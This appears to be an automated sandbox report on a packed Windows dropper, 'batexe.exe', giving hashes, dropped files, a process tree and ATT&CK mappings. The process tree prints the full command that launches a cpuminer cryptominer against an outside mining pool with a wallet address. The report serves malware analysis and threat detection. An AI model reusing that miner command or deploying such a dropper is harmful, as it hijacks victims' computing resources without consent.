73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
294s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
17/02/2024, 06:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3060	b2e.exe
1568	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1568	cpuminer-sse2.exe
1568	cpuminer-sse2.exe
1568	cpuminer-sse2.exe
1568	cpuminer-sse2.exe
1568	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3912-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3912 wrote to memory of 3060	3912	batexe.exe	72
PID 3912 wrote to memory of 3060	3912	batexe.exe	72
PID 3912 wrote to memory of 3060	3912	batexe.exe	72
PID 3060 wrote to memory of 2336	3060	b2e.exe	73
PID 3060 wrote to memory of 2336	3060	b2e.exe	73
PID 3060 wrote to memory of 2336	3060	b2e.exe	73
PID 2336 wrote to memory of 1568	2336	cmd.exe	76
PID 2336 wrote to memory of 1568	2336	cmd.exe	76

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3912
- C:\Users\Admin\AppData\Local\Temp\D49.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\D49.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D49.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\146D.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2336
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\146D.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\D49.tmp\b2e.exe

Filesize
287KB

MD5
ba95a5fbd62d8b456510f64a9ae78860

SHA1
79bdaf24db9f7e8230f1e5b6cb18cd1c74484626

SHA256
e7ecf4a4fbe8de139888761bb8928654fc432558b6bb01509b4ba7b2de2c74ea

SHA512
7f6432ad69b5fedfc8cd47cb4868b507ee5d64acb12b2c6421ea8da313163de16f257bdb40993116a43f056aec8d22609a3c086e42ae6ae1c682c3881e5ea4f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\D49.tmp\b2e.exe

Filesize
4.4MB

MD5
e4964e563c25f41aae49f8371baa26f6

SHA1
0235c7a8e73eae640bffb58e837512fffc3e25ca

SHA256
926c36069099f0de8f572c84d4e6bd38429e7d7fc8bab0fba1248c3e537412c9

SHA512
4938c12d34745453f3357cee607ac5e80d761e811dca5f11990fe68d47d7ceb4a2ecd96bc70c2c523def2a8450b54f3c9c6e21c60b65256484d4b32e4b91f939

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
779KB

MD5
a7db3c09a59dfe1d3beef3ffd2180eab

SHA1
377f1ec7095619000cf27a8d81c14aa3a68ba85a

SHA256
bbb9abe426174e2238f98a98f0dc2fd9e65b92265bd1dcf2fc7476f7cc86f860

SHA512
75a40629c85b30f435c679bdc9ad28af889abf318171e283f40267f285fc036c8e1ddbb3fc79598ed51894e45b3e480ebfa117e4a76b750f3e092e63b851e889

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
620KB

MD5
93231bc7518c41ec4202bbc8dbd07cfc

SHA1
092dc2731c7e67e50a77a692966fd9d5d6b400ae

SHA256
cc0be8e9f44cae74d1c67866dafea385f003bb6cf2e44904dccdc1d8124e8697

SHA512
8e53276e6f6c54791c0d8c2278b9571269273ae2cb51229102d0baa5f9e49323a7edc4bf25408cd2f03f8798f49eefd5b571da041f88745f838b1f9fadefb183

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
610KB

MD5
5d811311797d24ba831b355a275e83dd

SHA1
f414df6651e2ef2a5f94551d493939793512dd64

SHA256
65c90a7218f5fe95e9e745aefd81f1f29d29fb81cea75c36e1ee0182592c1274

SHA512
bda47285038bcb4ea3137716671adcd01f120e5c951e8dcad6d8d9e7dc6a0ffb55eff09210dc9740b7c2a191c39126825a5b98d8cbf891d93df6d49fc4267184

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
919KB

MD5
d6619fc2d9e1b4769cfb7f43eca5f294

SHA1
fa3c434782d7fcf7900b6a620fba27beb47002d8

SHA256
93d3d24339fbf56f01b57b83bd9fe21509fca9d5561697864a1691e81e14df5e

SHA512
69b763597467f85fd9aaf549c79cdf9eaeefa7d0aed66ce5810478a94d940c8d27801d7a48390980d81715b7d057c3230136ec53ea901e0515ff8bf50abca86c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
571KB

MD5
8a311648e343e720828e26fb258767d2

SHA1
91c03898d37d7052d32b3d7176aebf37ded04c3c

SHA256
fd8d444880aeb621a24d79a57b9c5814329c93a1fa28eedcde2fc904b1532228

SHA512
616e5425c44284826be49b024ac03f99265c43dd9f1b06d50d63a290fc5d154da4df6fa92349a6c81fc3ce9a5dbefb099bf067d5126a6d6c0ebd23ce9fbdcbcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
195KB

MD5
d3b88f740b2b612ed61d6337e632bbaa

SHA1
e1cb4e3400e3e58404ba402125166c5d32d18a3a

SHA256
efcb1a5874e81a562870888c659654be2db7a51704c7e62f23f069e619f677c8

SHA512
c463979cc2164846784b06dbe13cfd6729af99200b1e89d4fdbfd6e09798c22631344c415e0cea3b3961d1cf2cd0a35ff5a3ce224d9f796b482b227bbd8c4067

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
503KB

MD5
98a30d160e2dd934c63df033b5a40fa3

SHA1
5eb50e9ee5a510f22bf50fdf5f11d074c2b9090c

SHA256
06943d8170b85de2a27f51da34081860c61cac36887f3ebc8d537fd0e465db62

SHA512
853edaaf636e1a2d90eb68512588e421528ee7a11a0026eb05d2d7dc35405606736b62cf5901a9ccc4dbd79dd7679a1d585df33ed583e0197241f1361b1c3855

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
671KB

MD5
af6fa54abc08951c79058558ba04358f

SHA1
4bd33837fb4397685c7da9cd307d257ac5bf2bfc

SHA256
6a0b905264d2a27626fa67da42a3d366f4f900a1641bad3deef02fb7fd73b801

SHA512
9ef12cb60b2b1edc2fda0100ae5b44467051081dad499d258952fb587a55b3174b849cf7a65fd180154146fc8c1f142f6190afd3cc16b5ca5e6136419e13bccf

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
396KB

MD5
f7fddcb12906d2ab06a08a4d0176504f

SHA1
b2196e4b9e28715d29bb592cc598bd1b44b243ee

SHA256
030b1162c254516e3111d0912f6258cfe2b5d8b3f22673fb30a48d3694e23218

SHA512
131e9d25d7a31892261aa4a5a58367d7c9913329944e0f693a5b244c6c63906a44c23daf7661a55b25fd3aab32cc4a959aa9c7c10207c53bbbc5f69c1a4e229f

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
452KB

MD5
58cae5525a7c6d15c204db84910fd175

SHA1
d8d31815a0970808d1c752ed7473ee8656bc8f36

SHA256
6d4b6973e09bdc2c56c72967985226bdcc52017bcd6f6a5dc52124e56942851d

SHA512
53945d94d96c7aed47b861f645741f689e3b3dace46fd0615cc57169d6241de9c5c5d29e0505abf19f26ecdf6c7c7015b973afdcd5fdae3eac6dbd2c7e6753e9

Download Submit
memory/1568-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-43-0x0000000074E60000-0x0000000074EF8000-memory.dmp

Filesize
608KB

Download
memory/1568-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1568-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1568-44-0x0000000001030000-0x00000000028E5000-memory.dmp

Filesize
24.7MB

Download
memory/1568-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1568-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3060-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3060-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3912-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download